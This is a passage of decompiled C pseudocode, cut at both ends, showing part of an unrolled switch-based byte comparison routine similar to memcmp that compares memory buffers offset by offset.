                                                                                                                                      							_t910 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t910;
                                                                                                                                      							if(__edx + _t910 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L408;
                                                                                                                                      						case 8:
                                                                                                                                      							L154:
                                                                                                                                      							__edx =  *(__eax - 8);
                                                                                                                                      							if( *(__eax - 8) ==  *(__ecx - 8)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L164:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L165;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 8) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L157:
                                                                                                                                      								__esi =  *(__eax - 7) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 7) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L159:
                                                                                                                                      									__esi =  *(__eax - 6) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 6) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L161:
                                                                                                                                      										__esi =  *(__eax - 5) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 5) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t360 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t360;
                                                                                                                                      										}
                                                                                                                                      										goto L164;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t354 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t354;
                                                                                                                                      									if(__edx + _t354 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L161;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t348 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t348;
                                                                                                                                      								if(__edx + _t348 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L159;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t342 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t342;
                                                                                                                                      							if(__edx + _t342 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L157;
                                                                                                                                      						case 9:
                                                                                                                                      							L234:
                                                                                                                                      							__edx =  *(__eax - 9);
                                                                                                                                      							if( *(__eax - 9) ==  *(__ecx - 9)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L244:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L245;
                                                                                                                                      							}
                                                                                                                                      							__edx =  *(__ecx - 9) & 0x000000ff;
                                                                                                                                      							__esi =  *(__eax - 9) & 0x000000ff;
                                                                                                                                      							__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L237:
                                                                                                                                      								__esi =  *(__eax - 8) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 8) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L239:
                                                                                                                                      									__esi =  *(__eax - 7) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 7) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L241:
                                                                                                                                      										__esi =  *(__eax - 6) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 6) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t536 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t536;
                                                                                                                                      										}
                                                                                                                                      										goto L244;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t530 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t530;
                                                                                                                                      									if(__edx + _t530 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L241;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t524 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t524;
                                                                                                                                      								if(__edx + _t524 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L239;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t518 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t518;
                                                                                                                                      							if(__edx + _t518 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L237;
                                                                                                                                      						case 0xa:
                                                                                                                                      							L313:
                                                                                                                                      							__edx =  *(__eax - 0xa);
                                                                                                                                      							if( *(__eax - 0xa) ==  *(__ecx - 0xa)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L323:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L324;
                                                                                                                                      							}
                                                                                                                                      							__edx =  *(__ecx - 0xa) & 0x000000ff;
                                                                                                                                      							__esi =  *(__eax - 0xa) & 0x000000ff;
                                                                                                                                      							__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L316:
                                                                                                                                      								__edx =  *(__ecx - 9) & 0x000000ff;
                                                                                                                                      								__esi =  *(__eax - 9) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L318:
                                                                                                                                      									__edx =  *(__ecx - 8) & 0x000000ff;
                                                                                                                                      									__esi =  *(__eax - 8) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L320:
                                                                                                                                      										__edx =  *(__ecx - 7) & 0x000000ff;
                                                                                                                                      										__esi =  *(__eax - 7) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 7) & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t718 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t718;
                                                                                                                                      										}
                                                                                                                                      										goto L323;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t712 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t712;
                                                                                                                                      									if(__edx + _t712 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L320;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t706 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t706;
                                                                                                                                      								if(__edx + _t706 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L318;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t700 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t700;
                                                                                                                                      							if(__edx + _t700 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L316;
                                                                                                                                      						case 0xb:
                                                                                                                                      							L394:
                                                                                                                                      							__edx =  *(__eax - 0xb);
                                                                                                                                      							if( *(__eax - 0xb) ==  *(__ecx - 0xb)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L404:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L405;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0xb) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L397:
                                                                                                                                      								__esi =  *(__eax - 0xa) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0xa) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L399:
                                                                                                                                      									__esi =  *(__eax - 9) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 9) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L401:
                                                                                                                                      										__esi =  *(__eax - 8) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 8) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 8) & 0x000000ff) - ( *(__ecx - 8) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t903 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t903;
                                                                                                                                      										}
                                                                                                                                      										goto L404;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t897 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t897;
                                                                                                                                      									if(__edx + _t897 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L401;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t891 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t891;
                                                                                                                                      								if(__edx + _t891 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L399;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t885 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t885;
                                                                                                                                      							if(__edx + _t885 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L397;
                                                                                                                                      						case 0xc:
                                                                                                                                      							L143:
                                                                                                                                      							__edx =  *(__eax - 0xc);
                                                                                                                                      							if( *(__eax - 0xc) ==  *(__ecx - 0xc)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L153:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L154;
                                                                                                                                      							}
                                                                                                                                      							__edx =  *(__ecx - 0xc) & 0x000000ff;
                                                                                                                                      							__esi =  *(__eax - 0xc) & 0x000000ff;
                                                                                                                                      							__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L146:
                                                                                                                                      								__esi =  *(__eax - 0xb) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0xb) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L148:
                                                                                                                                      									__esi =  *(__eax - 0xa) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 0xa) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L150:
                                                                                                                                      										__esi =  *(__eax - 9) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 9) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 9) & 0x000000ff) - ( *(__ecx - 9) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t335 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t335;
                                                                                                                                      										}
                                                                                                                                      										goto L153;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t329 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t329;
                                                                                                                                      									if(__edx + _t329 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L150;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t323 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t323;
                                                                                                                                      								if(__edx + _t323 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L148;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t317 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t317;
                                                                                                                                      							if(__edx + _t317 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L146;
                                                                                                                                      						case 0xd:
                                                                                                                                      							L223:
                                                                                                                                      							__edx =  *(__eax - 0xd);
                                                                                                                                      							if( *(__eax - 0xd) ==  *(__ecx - 0xd)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L233:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L234;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0xd) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L226:
                                                                                                                                      								__esi =  *(__eax - 0xc) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0xc) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L228:
                                                                                                                                      									__esi =  *(__eax - 0xb) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 0xb) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L230:
                                                                                                                                      										__esi =  *(__eax - 0xa) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 0xa) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 0xa) & 0x000000ff) - ( *(__ecx - 0xa) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t510 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t510;
                                                                                                                                      										}
                                                                                                                                      										goto L233;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t504 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t504;
                                                                                                                                      									if(__edx + _t504 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L230;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t498 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t498;
                                                                                                                                      								if(__edx + _t498 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L228;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t492 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t492;
                                                                                                                                      							if(__edx + _t492 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L226;
                                                                                                                                      						case 0xe:
	L302:
	__edx =  *(__eax - 0xe);
	if( *(__eax - 0xe) ==  *(__ecx - 0xe)) {
		__esi = 0;
		L312:
		if(__esi != 0) {
			goto L98;
		}
		goto L313;
	}
	__esi = __dl & 0x000000ff;
	__edx =  *(__ecx - 0xe) & 0x000000ff;
	__esi = (__dl & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
	if(__esi == 0) {
		L305:
		__esi =  *(__eax - 0xd) & 0x000000ff;
		__edx =  *(__ecx - 0xd) & 0x000000ff;
		__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
		if(__esi == 0) {
			L307:
			__esi =  *(__eax - 0xc) & 0x000000ff;
			__edx =  *(__ecx - 0xc) & 0x000000ff;
			__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
			if(__esi == 0) {
				L309:
				__esi =  *(__eax - 0xb) & 0x000000ff;
				__edx =  *(__ecx - 0xb) & 0x000000ff;
				__esi = ( *(__eax - 0xb) & 0x000000ff) - ( *(__ecx - 0xb) & 0x000000ff);
				if(__esi != 0) {
					__edx = 0;
					_t692 = (0 | __esi > 0x00000000) - 1; // -1
					__esi = (__esi > 0) + _t692;
				}
				goto L312;
			}
			__edx = 0;
			__edx = 0 | __esi > 0x00000000;
			_t686 = __edx - 1; // -1
			__esi = __edx + _t686;
			if(__edx + _t686 != 0) {
				goto L98;
			}
			goto L309;
		}
		__edx = 0;
		__edx = 0 | __esi > 0x00000000;
		_t680 = __edx - 1; // -1
		__esi = __edx + _t680;
		if(__edx + _t680 != 0) {
			goto L98;
		}
		goto L307;
	}
	__edx = 0;
	__edx = 0 | __esi > 0x00000000;
	_t674 = __edx - 1; // -1
	__esi = __edx + _t674;
	if(__edx + _t674 != 0) {
		goto L98;
	}
	goto L305;
case 0xf:
	L383:
	__edx =  *(__eax - 0xf);
	if( *(__eax - 0xf) ==  *(__ecx - 0xf)) {
		__esi = 0;
		L393:
		if(__esi != 0) {
			goto L98;
		}
		goto L394;
	}
	__edx =  *(__ecx - 0xf) & 0x000000ff;
	__esi =  *(__eax - 0xf) & 0x000000ff;
	__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
	if(__esi == 0) {
		L386:
		__esi =  *(__eax - 0xe) & 0x000000ff;
		__edx =  *(__ecx - 0xe) & 0x000000ff;
		__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
		if(__esi == 0) {
			L388:
			__esi =  *(__eax - 0xd) & 0x000000ff;
			__edx =  *(__ecx - 0xd) & 0x000000ff;
			__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
			if(__esi == 0) {
				L390:
				__esi =  *(__eax - 0xc) & 0x000000ff;
				__edx =  *(__ecx - 0xc) & 0x000000ff;
				__esi = ( *(__eax - 0xc) & 0x000000ff) - ( *(__ecx - 0xc) & 0x000000ff);
				if(__esi != 0) {
					__edx = 0;
					_t878 = (0 | __esi > 0x00000000) - 1; // -1
					__esi = (__esi > 0) + _t878;
				}
				goto L393;
			}
			__edx = 0;
			__edx = 0 | __esi > 0x00000000;
			_t872 = __edx - 1; // -1
			__esi = __edx + _t872;
			if(__edx + _t872 != 0) {
				goto L98;
			}
			goto L390;
		}
		__edx = 0;
		__edx = 0 | __esi > 0x00000000;
		_t866 = __edx - 1; // -1
		__esi = __edx + _t866;
		if(__edx + _t866 != 0) {
			goto L98;
		}
		goto L388;
	}
	__edx = 0;
	__edx = 0 | __esi > 0x00000000;
	_t860 = __edx - 1; // -1
	__esi = __edx + _t860;
	if(__edx + _t860 != 0) {
		goto L98;
	}
	goto L386;
case 0x10:
	L132:
	__edx =  *(__eax - 0x10);
	if( *(__eax - 0x10) ==  *(__ecx - 0x10)) {
		__esi = 0;
		L142:
		if(__esi != 0) {
			goto L98;
		}
		goto L143;
	}
	__esi = __dl & 0x000000ff;
	__edx =  *(__ecx - 0x10) & 0x000000ff;
	__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
	if(__esi == 0) {
		L135:
		__esi =  *(__eax - 0xf) & 0x000000ff;
		__edx =  *(__ecx - 0xf) & 0x000000ff;
		__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
		if(__esi == 0) {
			L137:
			__esi =  *(__eax - 0xe) & 0x000000ff;
			__edx =  *(__ecx - 0xe) & 0x000000ff;
			__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
			if(__esi == 0) {
				L139:
				__esi =  *(__eax - 0xd) & 0x000000ff;
				__edx =  *(__ecx - 0xd) & 0x000000ff;
				__esi = ( *(__eax - 0xd) & 0x000000ff) - ( *(__ecx - 0xd) & 0x000000ff);
				if(__esi != 0) {
					__edx = 0;
					_t309 = (0 | __esi > 0x00000000) - 1; // -1
					__esi = (__esi > 0) + _t309;
				}
				goto L142;
			}
			__edx = 0;
			__edx = 0 | __esi > 0x00000000;
			_t303 = __edx - 1; // -1
			__esi = __edx + _t303;
			if(__edx + _t303 != 0) {
				goto L98;
			}
			goto L139;
		}
		__edx = 0;
		__edx = 0 | __esi > 0x00000000;
		_t297 = __edx - 1; // -1
		__esi = __edx + _t297;
		if(__edx + _t297 != 0) {
			goto L98;
		}
		goto L137;
	}
	__edx = 0;
	__edx = 0 | __esi > 0x00000000;
	_t291 = __edx - 1; // -1
	__esi = __edx + _t291;
	if(__edx + _t291 != 0) {
		goto L98;
	}
	goto L135;
case 0x11:
	L212:
	__edx =  *(__eax - 0x11);
	if( *(__eax - 0x11) ==  *(__ecx - 0x11)) {
		__esi = 0;
		L222:
		if(__esi != 0) {
			goto L98;
		}
		goto L223;
	}
	__esi = __dl & 0x000000ff;
	__edx =  *(__ecx - 0x11) & 0x000000ff;
	__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
	if(__esi == 0) {
		L215:
		__esi =  *(__eax - 0x10) & 0x000000ff;
		__edx =  *(__ecx - 0x10) & 0x000000ff;
		__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
		if(__esi == 0) {
			L217:
			__esi =  *(__eax - 0xf) & 0x000000ff;
			__edx =  *(__ecx - 0xf) & 0x000000ff;
			__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
			if(__esi == 0) {
				L219:
				__esi =  *(__eax - 0xe) & 0x000000ff;
				__edx =  *(__ecx - 0xe) & 0x000000ff;
				__esi = ( *(__eax - 0xe) & 0x000000ff) - ( *(__ecx - 0xe) & 0x000000ff);
				if(__esi != 0) {
					__edx = 0;
					_t485 = (0 | __esi > 0x00000000) - 1; // -1
					__esi = (__esi > 0) + _t485;
				}
				goto L222;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t479 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t479;
                                                                                                                                      									if(__edx + _t479 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L219;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t473 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t473;
                                                                                                                                      								if(__edx + _t473 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L217;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t467 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t467;
                                                                                                                                      							if(__edx + _t467 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L215;
                                                                                                                                      						case 0x12:
                                                                                                                                      							L291:
                                                                                                                                      							__edx =  *(__eax - 0x12);
                                                                                                                                      							if( *(__eax - 0x12) ==  *(__ecx - 0x12)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L301:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L302;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x12) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x12) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L294:
                                                                                                                                      								__esi =  *(__eax - 0x11) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 0x11) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 0x11) & 0x000000ff) - ( *(__ecx - 0x11) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L296:
                                                                                                                                      									__esi =  *(__eax - 0x10) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 0x10) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 0x10) & 0x000000ff) - ( *(__ecx - 0x10) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L298:
                                                                                                                                      										__esi =  *(__eax - 0xf) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 0xf) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 0xf) & 0x000000ff) - ( *(__ecx - 0xf) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t667 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t667;
                                                                                                                                      										}
                                                                                                                                      										goto L301;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t661 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t661;
                                                                                                                                      									if(__edx + _t661 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L298;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t655 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t655;
                                                                                                                                      								if(__edx + _t655 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L296;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t649 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t649;
                                                                                                                                      							if(__edx + _t649 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L294;
                                                                                                                                      						case 0x13:
                                                                                                                                      							L372:
                                                                                                                                      							__edx =  *(__eax - 0x13);
                                                                                                                                      							if( *(__eax - 0x13) ==  *(__ecx - 0x13)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L382:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L383;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 0x13) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x13) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L375:
                                                                                                                                      								__esi =  *(__eax - 0x12) & 0x000000ff;
